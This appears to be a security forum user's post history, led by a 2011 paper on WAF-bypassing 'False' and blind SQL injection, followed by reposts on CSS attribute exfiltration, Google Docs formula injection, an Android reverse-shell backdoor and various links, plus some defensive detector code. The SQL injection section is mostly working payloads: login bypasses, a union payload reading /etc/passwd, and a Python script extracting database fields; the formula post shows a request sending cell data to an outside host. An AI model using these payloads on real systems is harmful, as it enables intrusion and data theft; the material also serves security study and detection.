Everything posted by Nytro
-
[h=1]False SQL Injection and Advanced Blind SQL Injection[/h]
Exploit Title: False SQL injection and advanced blind SQL injection
Date: 21/12/2011
Author: wh1ant
Company: trinitysoft
Group: secuholic

This document publicizes a new SQL injection method for bypassing some web firewalls and other security solutions. I tested it on a web firewall made in Korea and most of the SQL injection attacks got through; I will not reveal the maker, to limit the damage. In order to follow this document, you have to understand basic MySQL principles. I classify the term "SQL Injection" into two meanings. The first is general SQL injection, which we usually call "True SQL Injection"; the second is "False SQL Injection". This document also shows some special points about "True SQL Injection". Note that my True/False SQL Injection is different from the True/False conditions mentioned in "Blind SQL Injection". The test environment was as follows: ubuntu server 11.04, mysql 5.1.54-1, Apache 2.2.17, PHP 5.3.5-1. The test code was as follows.
<?php
/*
create database injection_db;
use injection_db;
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));
insert into users values(1, 'admin', 'ad1234');
insert into users values(2, 'wh1ant', 'wh1234');
insert into users values(3, 'secuholic', 'se1234');

*** login.php ***
*/
if(empty($_GET['id']) || empty($_GET['password'])){
    echo "<html>";
    echo "<body>";
    echo "<form name='text' action='login.php' method='get'>";
    echo "<h4>ID <input type='text' name='id'><br>";
    echo "PASS<input type='password' name='password'><br></h4>";
    echo "<input type='submit' value='Login'>";
    echo "</form>";
    echo "</body>";
    echo "</html>";
}
else{
    $id = $_GET['id'];
    $password = $_GET['password'];
    $dbhost = 'localhost';
    $dbuser = 'root';
    $dbpass = 'pass';
    $database = 'injection_db';
    $db = mysql_connect($dbhost, $dbuser, $dbpass);
    mysql_select_db($database,$db);
    // Deliberately vulnerable: user input is concatenated straight into the query.
    $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error());
    $row = mysql_fetch_array($sql);
    if($row['id'] && $row['password']){
        echo "<font color=#FF0000><h1>"."Login success"."</h1><br>";
        echo "<h3><font color=#000000>"."Hello, ";
        echo "<font color=#D2691E>".$row['id']."</h3><br>";
    }
    else{
        echo "<script>alert('Login failed');</script>";
    }
    mysql_close($db);
}
?>

First, basic SQL injection is as follows.

' or 1=1#

The code above is general SQL injection code, which this writer classifies as "True SQL Injection". When you log on to a site, the web program checks your id and password with a statement such as "select id, password from table where id='' and password=''"; the attack is easy to understand once you think of the empty string between the single quotation marks as 0. An empty string is the same as 0, so the attack is possible using = and 0. As a result, the following statement makes the logon succeed.

'=0#

We can apply it in different ways.
This is possible because 0>-1.

'>-1#

Also, this is possible because 0<1.

'<1#

You don't have to use only single digits. You can use a two-digit attack as follows.

1'<99#

The comparison operation 0=1 evaluates to 0, so the result of the following operation is true because id=''=0 (0=1).

'=0=1#

Additionally, there is a comparison operator that makes both sides the same value.

'<=>0#

Like this, if you use comparison operators, you can attack in additional ways.

'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#

Now it is time to understand False SQL injection. The following is not an attack but a plain MySQL operation.

mysql> select * from users;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.01 sec)

This shows the contents of the table without any problem. The following is the result when you don't input any value for id.

mysql> select * from users where id='';
Empty set (0.00 sec)

Of course there is no result, because no id field holds an empty string. In fact, I have seen that in MySQL, if a string field is compared with 0, the result is true. Based on that, the following statement is true.

mysql> select * from users where id=0;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.00 sec)

If you input 0 as id, all the content is shown. This is the basis of "False SQL Injection". In the end, a result of 0 makes the logon succeed. To make the result 0, you need something that processes integers; for that you can use bitwise operations and arithmetic operations. First I will show a bitwise operation example. The bitwise OR operation is well known to any programmer. As I told you before, '' is 0, so if you compute "0 bitwise OR 0", the result is 0.
So the following operation succeeds in logging on as a False SQL injection.

'|0#

Naturally, you can use the AND operation.

'&0#

This is the attack using XOR.

'^0#

Shift operations also work.

'<<0#
'>>0#

If you apply bitwise operations like these, you can use various attack methods.

'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#

Now I will show "False SQL Injection" using arithmetic operations. If the result of an arithmetic operation with '' is 0, the attack will succeed. The following are examples using arithmetic operations.

'*9# Multiplication
'/9# Division
'%9# Mod
'+0# Addition
'-0# Subtraction

The significant point is that the result has to be below one. You can also attack as follows.

'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#

The next attack uses functions. In this document I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with as many functions as you want. Whether the attack is "True SQL Injection" or "False SQL Injection" is decided by the last operation after the function returns.

'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#

You can also attack using a space in the function name, but only some functions allow the space.

'=upper (0)#

Next, the method uses SQL keywords. This method is also decided as True or False injection according to the case.

' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#

Entering both the id and password fields without a comment marker is also possible for True and False SQL injection. Normal web firewalls filter #, --, and /**/, so this method is more effective against web firewalls.
ID : '=' PASS: '='
ID : '<>'1 PASS: '<>'1
ID : '>1=' PASS: '>1='
ID : 0'='0 PASS: 0'='0
ID : '<1 and 1>' PASS: '<1 and 1>'
ID : '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1
ID : '=round(0,1)='1 PASS: '=round(0,1)='1
ID : '*0*' PASS: '*0*'
ID : '+' PASS: '+'
ID : '-' PASS: '-'
ID : '+1-1-' PASS: '+1-1-'

All attacks used in this document will be more effective at bypassing a web firewall when brackets are used.

'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#

Let's look at a normal SQL injection attack.

' or 1=1#

URL-encoded in hexadecimal, it is as follows.

http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234

An attack like the one above is basically filtered, so it is not a good attack. I will try to bypass the filtering using a tab (%09) in place of the space (%20). In fact, you can also use %a0 instead of %09. The possible values are as follows.

%09
%0a
%0b
%0c
%0d
%a0
%23%0a
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

The following is the example using %a0 instead of %20.

http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234

Now I will show a "Blind SQL injection" attack. This attack cannot bypass web firewall filtering, but some attackers tend to think that a Blind SQL injection attack is impossible on a logon page, so I decided to show this subject. The following attack code can be used on a logon page, and the page will show the id and password.

'union select 1,group_concat(password),3 from users#

This attack code retrieves the /etc/passwd information.

'union select 1,load_file(0x2f6574632f706173737764),3 from users#

Blind SQL injection without a union select statement, using the and operator, is also possible. The record count is three.

admin' and (select count(*) from users)=3#

Let's attack, bypassing the web firewall, using Blind SQL injection. The following code is vulnerable to Blind SQL injection.
<?php
/*** info.php ***/
$n = $_GET['num'];
if(empty($n)){
    $n = 1;
}
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'root';
$database = 'injection_db';
$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database,$db);
// Deliberately vulnerable: num is appended to the query without casting or quoting.
$sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error());
$info = @mysql_fetch_row($sql);
echo "<body bgcolor=#000000>";
echo "<h1><font color=#FFFFFF>wh1ant</font>";
echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>";
echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>";
echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>";
echo "</body>";
mysql_close($db);
?>

Basic Blind SQL injection on the page above is as follows.

http://127.0.0.1/info.php?num=1 and 1=0
http://127.0.0.1/info.php?num=1 and 1=1

But using the = operator alone is also possible for Blind SQL injection.

http://192.168.137.129/info.php?num=1=0
http://192.168.137.129/info.php?num=1=1

Naturally, other operators are possible too.
http://127.0.0.1/info.php?num=1<>0
http://127.0.0.1/info.php?num=1<>1
http://127.0.0.1/info.php?num=1<0
http://127.0.0.1/info.php?num=1<1
http://127.0.0.1/info.php?num=1*0*0*1
http://127.0.0.1/info.php?num=1*0*0*0
http://127.0.0.1/info.php?num=1%1%1%0
http://127.0.0.1/info.php?num=1%1%1%1
http://127.0.0.1/info.php?num=1 div 0
http://127.0.0.1/info.php?num=1 div 1
http://127.0.0.1/info.php?num=1 regexp 0
http://127.0.0.1/info.php?num=1 regexp 1
http://127.0.0.1/info.php?num=1^0
http://127.0.0.1/info.php?num=1^1

Attack example:

http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1)
http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1)
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)
http://127.0.0.1/info.php?num=0^(id=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

Showing every attack would take too much time, so I stop here. Blind SQL injection is difficult to do manually, so using a tool is more effective. I will show a tool written in Python; this is an example using the ^ (XOR) bitwise operation. To make the most of bypassing the web firewall, I replaced the space with %0a.
#!/usr/bin/python
### blind.py ###
import urllib
import sys

def put_data(true_url, true_result, field, index, length):
    # Recover the field one character at a time, comparing each response
    # against the known "true" page.
    for i in range(1, length+1):
        for j in range(32, 127):
            attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j,field,index,i,i)
            attack_open = urllib.urlopen(attack_url)
            attack_result = attack_open.read()
            attack_open.close()
            if attack_result==true_result:
                ch = "%c" % j
                sys.stdout.write(ch)
                break
    print "\t\t",

def get_length(false_url, false_result, field, index):
    # Find the field length by testing octet_length() against increasing values.
    i=0
    while 1:
        data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i)
        data_length_open = urllib.urlopen(data_length_url)
        data_length_result = data_length_open.read()
        data_length_open.close()
        if data_length_result==false_result:
            return i
        i+=1

url = "http://127.0.0.1/info.php"

true_url = url + "?num=1"
true_open = urllib.urlopen(true_url)
true_result = true_open.read()
true_open.close()

false_url = url + "?num=0"
false_open = urllib.urlopen(false_url)
false_result = false_open.read()
false_open.close()

print "num\t\tid\t\tpassword"
fields = "num", "id", "password"
for i in range(1, 4):
    for j in range(0, 3):
        length = get_length(false_url, false_result, fields[j], i)
        put_data(false_url, true_result, fields[j], i, length)
    print ""

Regrettably, the attack testing stopped for lack of time; anyone who studies these attack codes further will find it easy to develop the attack.

# Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt

[EOF]

Source: Vulnerability analysis, Security Papers, Exploit Tutorials
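An added example from the editor, not part of wh1ant's paper: a small Python log checker that decodes request parameters the way PHP's $_GET does, normalizes the alternative whitespace bytes the paper substitutes for %20, and flags the quote-then-operator, comment and non-numeric patterns the paper's payloads rely on. The access-log lines are constructed for this example; the parameter names come from the paper's login.php and info.php.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Bytes MySQL's lexer accepts as whitespace; the paper sends them instead of
# %20 to slip past filters that only look for a plain space.
ALT_WHITESPACE = "\t\n\x0b\x0c\r\xa0"
_WS_TABLE = str.maketrans(ALT_WHITESPACE, " " * len(ALT_WHITESPACE))

# Comment markers that cut off the rest of the query: #, -- , /**/
COMMENT_RE = re.compile(r"#|--\s|/\*.*?\*/")
# A quote followed (after optional whitespace) by a comparison, arithmetic or
# bitwise operator: '=0  '<>1  '|0  '^0  '+2+5-7  '*round(1,1)
QUOTE_OPERATOR_RE = re.compile(r"'\s*[=<>!&|^*/%+-]")
# A quote followed by one of the keyword operators the paper uses instead.
QUOTE_KEYWORD_RE = re.compile(
    r"'\s*(?:and|or|xor|div|is|like|regexp|between|order|group)\b", re.I)
# Parameters the application compares as integers (info.php's num).
NUMERIC_PARAMS = {"num"}
NUMERIC_RE = re.compile(r"^-?\d+$")

LOG_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_params(path):
    """Decode the query string the way PHP's $_GET sees it.

    latin-1 keeps a lone %a0 as U+00A0 instead of a replacement character;
    '+' becomes a space, so an injected plus has to arrive as %2b.
    """
    return parse_qsl(urlsplit(path).query, keep_blank_values=True,
                     encoding="latin-1")


def normalize(value):
    """Map every whitespace byte MySQL accepts to a plain space."""
    return value.translate(_WS_TABLE)


def findings_for(name, value):
    """List the suspicious patterns in one decoded parameter value."""
    v = normalize(value)
    found = []
    if any(ch in value for ch in ALT_WHITESPACE):
        found.append("alt-whitespace")
    if COMMENT_RE.search(v):
        found.append("comment")
    if QUOTE_OPERATOR_RE.search(v):
        found.append("quote-operator")
    if QUOTE_KEYWORD_RE.search(v):
        found.append("quote-keyword")
    if name in NUMERIC_PARAMS and not NUMERIC_RE.match(v.strip()):
        found.append("non-numeric")
    return found


def analyze_request(path):
    """Return {param: [findings]} for every parameter that looks injected."""
    result = {}
    for name, value in decode_params(path):
        f = findings_for(name, value)
        if f:
            result[name] = f
    return result


def scan_log(lines):
    """Run analyze_request over access-log lines; keep only flagged requests."""
    hits = []
    for line in lines:
        m = LOG_REQUEST_RE.search(line)
        if m:
            verdict = analyze_request(m.group(1))
            if verdict:
                hits.append((m.group(1), verdict))
    return hits


# Constructed access-log lines; the payloads are the ones the paper lists.
SAMPLE_LOG = [
    '127.0.0.1 - - [21/Dec/2011:10:00:01 +0900] "GET /login.php?id=admin&password=ad1234 HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Dec/2011:10:00:02 +0900] "GET /login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234 HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Dec/2011:10:00:03 +0900] "GET /login.php?id=%27%3d0%23&password=x HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Dec/2011:10:00:04 +0900] "GET /login.php?id=%27%2b%2b%2b0%2b%2b%2b%2b%2b0*0%23&password=x HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Dec/2011:10:00:05 +0900] "GET /login.php?id=%27%3d%27&password=%27%3d%27 HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Dec/2011:10:00:06 +0900] "GET /info.php?num=2 HTTP/1.1" 200 401',
    '127.0.0.1 - - [21/Dec/2011:10:00:07 +0900] "GET /info.php?num=1%3d0 HTTP/1.1" 200 401',
    '127.0.0.1 - - [21/Dec/2011:10:00:08 +0900] "GET /info.php?num=0^(%a0locate%a0%a0(0x61,(%a0select%a0id%a0%a0from%a0%a0users%a0where%a0num=1),1)=1) HTTP/1.1" 200 401',
]

if __name__ == "__main__":
    for path, verdict in scan_log(SAMPLE_LOG):
        print(path, "->", verdict)
```

Detection of this kind only narrows what reaches the application; the fix the paper's login.php and info.php actually need is a prepared statement with bound parameters and an integer cast on num.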
-
Holy crap, don't make a mockery of this category.
-
What the fuck kind of "tutorials" are these? Stop posting all this crap.
-
[h=1]30 Best Sources For Linux / *BSD / Unix Documentation On the Web[/h]by Vivek Gite on December 21, 2011 Man pages are written by sys-admins and developers for IT techs, and are intended more as a reference than as a how-to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for a particular command or configuration file; they are not helpful for new Linux users, and they are not good for learning something new for the first time. Here are the thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
-
Changing the 10-post limit for posting in the help section
Nytro replied to crs12decoder's topic in Sugestii
How many got a warning or a ban for posting there without having 10 posts? Maybe 2-3 who came with idiotic questions and requests. Probably only a few warnings were given for that, depending on the post in question. We don't hold on to that rule too strongly, but in the end it is useful. Why should everyone be a leecher who contributes nothing? First of all one can introduce oneself; from that we get an idea about the person in question and we may even tolerate a stupid request. Then, anyone can post an IT news item or something useful. -
[h=1]Probably the Best Free Security List in the World[/h]Updated 21. December 2011 - 4:27 by ako
1. Introduction / Keys / What's New
2. Realtime Protection
3. Scanners
4. Virus Removal Tools
5. Online Scanners
6. Firewalls
7. HIPS
8. System Hardening-HIPS
9. System Hardening
10. Sandboxing / Virtualization
11. Vulnerability Scanning
12. Browser Security
13. IP-Blocking/Hardening
14. Privacy
15. System Monitoring
16. Network Traffic Monitoring
17. System Cleaning
18. Data Rescue
19. Encrypting
20. Backup
21. System Rescue
22. Miscellaneous
23. Tests & Analysis Tools
24. Vista/Windows 7 Security
25. My Choices and More
Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm
-
ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/
-
[h=4]Securitytube Metasploit Framework Expert ( Armitage )[/h] Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Source: Securitytube Metasploit Framework Expert ( Armitage ) Yes, a tutorial about Armitage...
-
[h=4]Execute Binary In The Alternate Data Stream[/h]A simple and possibly useful trick. Description: Since Vista the start command is forbidden for ADS. Here is a workaround. Source: Execute Binary In The Alternate Data Stream
-
[h=4]How Not To Implement Cryptography For The Owasp Top 10[/h] Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber Source: How Not To Implement Cryptography For The Owasp Top 10
-
Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new, it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms. The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication. "In this demonstration Android’s power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client’s intellectual property as it passed through their devices. 
It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said. Source: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)
-
CSS - The Sexy Assassin: Tactical Exploitation using CSS. Old Attacks, New Research, New Attacks. Download: http://www.megaupload.com/?d=2E0FY6BJ
Of interest: Access DOM attributes using CSS: This example is just a very simple proof of concept -- showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test. Just to be sure. Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit -- but not necessarily important for the attack itself. I just had to implement it because of faulty dimensioning of boxes styled with external fonts. So -- the essence of the attack is that we can map attribute content into the DOM by using CSS :after and content:attr(href), for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts - each font is only supplied with one visible character, all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't.
@font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); }
@font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); }
@font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); }
@font-face { font-family: TestR; src: url(test_R.svg#TestR) format("svg"); }
@font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); }
@font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); }
div { border: 1px solid red; height: 20px; overflow-x: none; overflow-y: auto; -webkit-animation-duration: 5s; -webkit-animation-name: decrease; }
div a:after { color:white; }
div.a a:after { content: attr(href); font-family: TestS; }
div.b a:after { content: attr(href); font-family: TestE; }
div.c a:after { content: attr(href); font-family: TestZ; }
div.d a:after { content: attr(href); font-family: TestT; }
div.e a:after { content: attr(href); font-family: TestC; }
div.f a:after { content: attr(href); font-family: TestR; }

So -- only if a character existing in that font is part of the attribute value will the mapped content have dimension. If we squeeze the box a bit, we will get a scrollbar. But only if the font-character match is given. This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg That "one char only dimension" thing connected with the squeezing means that if we can find out when the scrollbar appears, we can know which character is part of the attribute value. Now - how can we create a scrollbar that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows you to fully style scrollbars. We can of course also define a background image for a scrollbar. Too bad that if we do that, the image will be fetched onload. So it's more or less useless.
But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume). And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom.

div::-webkit-scrollbar { width: 12px; }
div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); }
div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); }
div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); }
div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); }
div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); }
div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); }

Now if we glue the whole thing together, we simply need the following ingredients:
* A CSS injection
* Some or two CSRF protected links with a token
* One SVG font per character to determine
* A server listening for incoming requests

The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of any glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible. The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those character tests that don't result in a visible character.

@-webkit-keyframes decrease { from { width: 340px; } 50% { width:105px; } 100% { width:340px; } }

To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well.
This is our negative test proving that it really works. So - conclusion: We can enumerate characters via CSS -- that is not new since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit nevertheless we can do it FAST and without a massive footprint. My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload so we can avoid attacks like these. The only thing making this attack work is the fact that some parts of the scrollbar load data from an external machine on visibility/appearance -- and not on declaration in the style-sheet. Source: http://html5sec.org/webkit/test
-
[h=3]Excel formula injection in Google Docs[/h][h=2]December 21, 2011[/h] Surely all of you know about Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov. One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey. There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey. This is how the form looks for a participant: And this is how the author sees the participant's answers: I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here? We tried it, too. However, everything was encoded and filtered exactly as planned. Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula? Excel formulas start with an “=”. OK, let’s give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace %08 is the Hex code of the backspace key. Thus, we wrote in the entry field: %08=1+2+C3 Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector: 1) Put sensitive user data into A1 cell (or probably they are already there) 2) Put a formula which makes GET request to http://own_site.com/secret_data_in_base64 into Z666 cell. 
3) Read web server logs, get data from cells. 4) Profit! Soon after describing the bug and the possible attack vector we got the following letter: And a bit later we saw our names in Google Hall of Fame Finally, a little Google Hack Posted by DSecRG Source: Digital Security Research Group: Excel formula injection in Google Docs
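An added defensive example (editor's code, not from the DSecRG post): it models why a space prefix in front of "=" fails once a backspace is processed, and shows a sanitizer that strips control characters before checking for formula triggers. The space_prefix_defence function is an assumed model of the behaviour the post describes, not Google's code; the payload is the one from the post.

```python
import re

# Leading characters that make a spreadsheet evaluate a cell as a formula
# (OWASP CSV/formula injection guidance): =, +, -, @, tab, carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# C0 control characters and DEL; backspace (\x08) is the one used in the post.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")

# The entry the post submitted: a backspace followed by a formula.
PAYLOAD = "\x08=1+2+C3"


def apply_backspaces(text):
    """Model a consumer that honours \\x08 by deleting the preceding character."""
    out = []
    for ch in text:
        if ch == "\x08":
            if out:
                out.pop()
        else:
            out.append(ch)
    return "".join(out)


def is_formula(cell):
    """Would a spreadsheet evaluate this stored cell rather than display it?"""
    return cell.startswith(FORMULA_TRIGGERS)


def space_prefix_defence(value):
    """Assumed model of the defence the post describes: insert a space in
    front of a value whose first visible character is '='. Control characters
    are skipped when looking for that '=', which is what lets \\x08 through."""
    visible = CONTROL_RE.sub("", value)
    return " " + value if visible.startswith("=") else value


def sanitize_cell(value):
    """Neutralise formula injection before writing user input into a sheet.

    Control characters are removed first, so nothing can later erase the
    protection; then a leading apostrophe marks the cell as literal text if
    its first character would otherwise be read as a formula trigger.
    """
    clean = CONTROL_RE.sub("", value).lstrip()
    if clean.startswith(FORMULA_TRIGGERS):
        clean = "'" + clean
    return clean


def compare(value):
    """Return (weak_is_formula, strong_is_formula) for one submitted value."""
    weak = apply_backspaces(space_prefix_defence(value))
    strong = apply_backspaces(sanitize_cell(value))
    return is_formula(weak), is_formula(strong)


if __name__ == "__main__":
    print(compare(PAYLOAD))           # (True, False)
    print(compare("=1+2+C3"))         # (False, False)
    print(compare("plain answer"))    # (False, False)
```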
-
Metasploit Tutorial: An introduction to Metasploit Community
Nytro posted a topic in Tutoriale video
[h=2]Metasploit Tutorial: An introduction to Metasploit Community[/h]Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. Scanning Networks with Metasploit Community Basic Exploitation with Metasploit Community Basic Exploitation vs. Smart Exploitation Importing Nexpose Scan Data into Metasploit Using Metasploit Community with Nexpose If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now! Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community -
Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a workaround for the impending censorship measures being considered: DeSOPA. The Firefox add-on is stunningly simple, as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. Download music, movies, games, software! The Pirate Bay - The world's most resilient BitTorrent site) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists are created, provided the bills become law. A new anti-SOPA add-on for Firefox, titled “DeSopa”, is such a counter measure. When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site through the bare IP address (if supported). “I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of Internet, for which I and many others live and breathe,” DeSopa developer T Rizk told. “It could be that a few members of congress are just not tech savvy and don’t understand that it is technically not going to work, at all. So here’s some proof that I hope will help them err on the side of reason and vote SOPA down,” he adds. If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates. 
What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet. If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative. Source: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)
-
Hunting malware with Volatility v2.0
Frank Boldewin, CAST Forum, December 2011 (English edition)
What is Volatility?
- Forensics framework to acquire digital artifacts from memory dumps
- Completely written in Python
- Current stable version is 2.0.1
- Easy to use plugin interface
- Supports the following x86 Windows versions:
  - Windows XP SP 2, 3
  - Windows 2003 Server SP 0, 1, 2
  - Windows Vista SP 0, 1, 2
